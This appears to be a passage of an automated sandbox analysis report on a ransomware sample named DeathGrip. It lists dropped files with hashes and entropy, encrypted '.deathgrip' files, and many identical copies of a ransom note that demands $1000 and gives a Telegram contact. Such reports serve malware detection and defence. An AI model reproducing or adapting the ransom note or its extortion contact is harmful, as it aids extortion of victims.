                                                          MD5:BAB85ABDD8AACF7EC4D3B01A0E9345A3
                                                          SHA1:1F53E6F0CFAB3507B8D15B77A62AFDEF999A3344
                                                          SHA-256:C7DD4B9722507C411DB9385EBA0560F5F8AEBC192A60BB2A0378FA1A4BACA971
                                                          SHA-512:FF330FDA99767E2DBC0D488DA3DB5B439D032EFFFA29F17A659F954748D0C273868147254EED8089D44374AD00613B4566905A19E003CCA9D63D7FBF4B109695
                                                          Malicious:true
                                                          Preview:...........`.F..\...u3...E....y.Z..3..A.0Q@....;..`V..~...P=?7"...|H,...9+.*.%.A[.....7.a...?....w.SQ.....Q......CIG.."...C.xV.....~.jIv....N.I=...../.....2~..O.v9.Y-#.....*.E...3\.r.4.2..e.M..w....|....K..$...q.,G...%.?Z/.[X[.....h>.]..c...8<...6....\...`..:....C?...c.....6WM0./...&.k.3..._k.*.e..E.{...._..%..Gw4w.OgR...V}...'....D..^...... (W.."..>G?...=.?.O..U.J..S..L.i....Ov[...8....wAh..%5DX..6.j}1MS!~......7..0zy....o..J....l.W....*Q.6F....H.P(.h.Y.M....$@...}.......OF..._......p.V.%..W)i..#.hp.!He.Mz...?.P...Ey.f..E.3..g.#..~.....&W.q.;y.\..Nl...%..&....b1MC....?.....*.k.V..g./...O....'W...F.r.Q.d.z...urC$.,\..Nw....M.......<<}-A.....X..n.....m.....V......B...1..E...`).t.b.W..1E....[..d.U!.R......c[.g...t....c/..GeaeH.J.u.....o(.#.......7..LZ.u2...uZ.t.$f...M. ..\u.....H........ ..y=<.- p.S.T...(.@7%+.....X_..Z.?..p(r.].6.._/.K..|o9..L....N.....B..L5..d.gl..T....f...Ii.y(Scumt!...>iwU.......^....V..O.Pi.........v...p>>....Lf...y.x.2.

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0S019LQ4\2\xIW3D5oXL8xIpGjHoiGVJS_B4mg.br[1].js

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0S019LQ4\2\xIW3D5oXL8xIpGjHoiGVJS_B4mg.br[1].js.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):58144
                                                          Entropy (8bit):7.9964602029403045
                                                          Encrypted:true
                                                          SSDEEP:1536:bQauVfYeehc3o24+Mp7b1WGm8f4zRDGf+H5WQFhDecqXMkCCx:uVf8c3o24tvTLfaIf+HIwYcqXME
                                                          MD5:4CFB81BCAF4727258AE7F692E966263D
                                                          SHA1:CC8049E36236821CBD8D46CDAC4B00CD6DFE1A54
                                                          SHA-256:865998F795D9409F41A9790AA3EF1A8B92D2729B779F863214349945A3FB9829
                                                          SHA-512:196620796C75C96319545FCECB2F2AEC3219F024451A6F64C31AC3217E11C7EB4A83979FD6A5F5571F8BBC2F0BB152F7DB2F1DDBE3406216A4FF2F41EB12F54B
                                                          Malicious:true
                                                          Preview:..........F...S..Z.<. <=.T.a._kq.....4..50.....W......5$...V]...g..>..e.%..X....V..b..'.....\g..rdj<.HWx.t.....iA.6....T.....7.@...J...Z.MJ...N....|$K..?..].s.]..C.>.:r...F.vRL..4.{4.p}'........D.u....b.;..O...w..C...U...q....[....'n*..u..P..(..g.Y..A..=.<^......br".....9z.B..S...$51H_...Q5.......M..hG.....`..c9d..[.c...9.;]..5..Z%.Dc.i.+..28.jnpTvBNu..u...z.+...>F...!..L.....c..k...e.........Z...{IQ:.!.....x......u.:....74....i......V.9...|.Y.....z+..S.*Ol.e..A....=8..-.....!_z..2..9.,!A.AO.....-.2.,6?.`:..8.uO.rB..u..j}.J.Zc.(MQ..^.SA.jX.0.m.....z,^<.H...)..<j..&.k?..H$.@...X...T..,@w"...b.4.0i.A.......BC@.B.K5...D......#....0.FdX..g...P..n..1.x .iQ.,.....w.v.hD...n........e...%u.R3......<...=..G..9.R.P9.....L.t.I....aw......d.....s.(_6.....Qj.y+..1}.HX.(.v3.e...U6|~A<~....:.h.{.v....v6...I.G...4s.............&........3y.*........<Q....)X.{...Y..eG.:A.ZFq/..3.d'....<....\.P*..xop.z.l..C...;../.0.<'3..!"@.3.....?.\....m.=......f.~'-)?P.TE

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409675802988272.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409677868939833.txt.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):117744
                                                          Entropy (8bit):7.998509202759884
                                                          Encrypted:true
                                                          SSDEEP:3072:bc3H8ipUxn9KSkx06kkbfjgg+yC+yE/FxbzpJUc:bc3Hmxn9z2kkbfjnryENhzpyc
                                                          MD5:44D49AA5BDFFED1A33899D3EE74AFD73
                                                          SHA1:9393B82644042BD98C90675A5B0EE81FCAC2F4CF
                                                          SHA-256:20494D8F434870362F8F4A2263D25706A1F206A541B59DC8896183F341ADCD86
                                                          SHA-512:4C892F9E998523699A9F4DBFA28D2A3E695D87C5959E612A6DDEB1030D67D29E7486089F05C03C757CB5E3E8B11CB44279571C8388F5F922EB883D90F24B7D07
                                                          Malicious:true
                                                          Preview:........7.?.<Z~g..(..'y^..o.<Vf1W.......?...e...c.?..M.YE......s7.....C..Wl........~......,...I..../.....\...^.y..>t...v.N.......[.....-Ey{.:/j.I6..=.?..|.K.{.x.P.nk...........b..;...G...QMz.)..d..|.My.n.J...u.a..q.6.N!..#0.....8..}jr...#.4d..Q.....+lS.W7.[n...d.[jm.....b..GSUV...h.iM2..^@.......Um.....Y....J........l..../k...=.n~...w*x.o..W..NW...buK.....76.y.f...i.9x>4...'.t.....sF..O..3..p....p.vk.).^....5J.z.O....`V_.f.......P.!..W..#s;.z..}.y$.Vi.'..B.y.f...s`DAVl..S....0!..FD"+.l,.....mE....@..`..'......-..9k.....K.l..>b-7...;..r...dj.?.(..T....,.2...$..8F_..'0...U.lT.r.:.ui)ZA3.>.."..Z...../.*cP|...c..|...Txhp._.u..=..0......:.,..{x0....T..x,&..N&w].?..K@.L..*...U.}j;..[...U".%|Di/...2..F..DB.yg%.q9.{....<..6on....3...6...I..X... 1p....:.e..i..'.....b....).co.}...+.02.-.l(.s........=!uu.."/^....|sQ....{....YP..!&.r.Z.........J..gu.......o..Ir.?.D..'...6.g.......Q..t..#..ud9.8K.n:2......R.t.. _|..Yb..]`M....H....i.CGS.8.. $...H:.

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\Settings\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.WindowsAlarms_8wekyb3d8bbwe\Settings\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.WindowsCalculator_8wekyb3d8bbwe\Settings\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.WindowsCamera_8wekyb3d8bbwe\Settings\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\Settings\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.WindowsMaps_8wekyb3d8bbwe\Settings\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\Settings\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.WindowsStore_8wekyb3d8bbwe\AC\INetCache\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Temp\Symbols\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_ARC4.pyd

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):11264
                                                          Entropy (8bit):4.703513333396807
                                                          Encrypted:false
                                                          SSDEEP:96:nDzb9VD9daQ2iTrqT+6Zdp/Q0I1uLfcC75JiC4Rs89EcYyGDV90OcX6gY/7ECFV:Dzz9damqTrpYTst0E5DVPcqgY/79X
                                                          MD5:6176101B7C377A32C01AE3EDB7FD4DE6
                                                          SHA1:5F1CB443F9D677F313BEC07C5241AEAB57502F5E
                                                          SHA-256:EFEA361311923189ECBE3240111EFBA329752D30457E0DBE9628A82905CD4BDB
                                                          SHA-512:3E7373B71AE0834E96A99595CFEF2E96C0F5230429ADC0B5512F4089D1ED0D7F7F0E32A40584DFB13C41D257712A9C4E9722366F0A21B907798AE79D8CEDCF30
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Joe Sandbox View:
                                                          • Filename: 0U9NY2PzhK.exe, Detection: malicious, Browse
                                                          • Filename: qlk8old6p9.exe, Detection: malicious, Browse
                                                          • Filename: tjigfd64.exe, Detection: malicious, Browse
                                                          • Filename: tjigfd64.exe, Detection: malicious, Browse
                                                          • Filename: neverlose.exe, Detection: malicious, Browse
                                                          • Filename: dXaIbmbdKj.exe, Detection: malicious, Browse
                                                          • Filename: visabuilder.exe, Detection: malicious, Browse
                                                          • Filename: allchecker.exe, Detection: malicious, Browse
                                                          • Filename: LisectAVT_2403002A_396.exe, Detection: malicious, Browse
                                                          • Filename: 00#U2800.exe, Detection: malicious, Browse
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........K...*b..*b..*b..R...*b..Uc..*b.Rc..*b..*c..*b..Ug..*b..Uf..*b..Ua..*b..j..*b..b..*b....*b..`..*b.Rich.*b.................PE..d....e.........." ...%............P........................................p............`.........................................P(.......(..d....P.......@...............`..,...."...............................!..@............ ...............................text............................... ..`.rdata..,.... ......................@..@.data...8....0......."..............@....pdata.......@.......$..............@..@.rsrc........P.......(..............@..@.reloc..,....`.......*..............@..B................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_Salsa20.pyd

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):13312
                                                          Entropy (8bit):4.968452734961967
                                                          Encrypted:false
                                                          SSDEEP:96:JF3TgNlF/1Nt5aSd4+1ijg0NLfFNJSCqsstXHTeH5ht47qMbxbfDqbwYH/kcX6gT:WF/1nb2mhQtkXHTeZ87VDqrMcqgYvEp
                                                          MD5:371776A7E26BAEB3F75C93A8364C9AE0
                                                          SHA1:BF60B2177171BA1C6B4351E6178529D4B082BDA9
                                                          SHA-256:15257E96D1CA8480B8CB98F4C79B6E365FE38A1BA9638FC8C9AB7FFEA79C4762
                                                          SHA-512:C23548FBCD1713C4D8348917FF2AB623C404FB0E9566AB93D147C62E06F51E63BDAA347F2D203FE4F046CE49943B38E3E9FA1433F6455C97379F2BC641AE7CE9
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d....e.........." ...%............P.....................................................`..........................................8......x9..d....`.......P..L............p..,....3...............................1..@............0...............................text...(........................... ..`.rdata.......0......................@..@.data...8....@.......*..............@....pdata..L....P.......,..............@..@.rsrc........`.......0..............@..@.reloc..,....p.......2..............@..B........................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_chacha20.pyd

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):13824
                                                          Entropy (8bit):5.061461040216793
                                                          Encrypted:false
                                                          SSDEEP:192:ldF/1nb2mhQtkXn0t/WS60YYDEiqvdvGyv9lkVcqgYvEMo:v2f6XSZ6XYD6vdvGyv9MgYvEMo
                                                          MD5:CB5238E2D4149636377F9A1E2AF6DC57
                                                          SHA1:038253BABC9E652BA4A20116886209E2BCCF35AC
                                                          SHA-256:A8D3BB9CD6A78EBDB4F18693E68B659080D08CB537F9630D279EC9F26772EFC7
                                                          SHA-512:B1E6AB509CF1E5ECC6A60455D6900A76514F8DF43F3ABC3B8D36AF59A3DF8A868B489ED0B145D0D799AAC8672CBF5827C503F383D3F38069ABF6056ECCD87B21
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
